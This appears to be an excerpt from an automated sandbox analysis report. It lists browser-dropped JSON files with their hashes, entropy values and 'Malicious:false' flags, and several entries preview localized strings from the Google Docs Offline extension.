                                                                                                                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
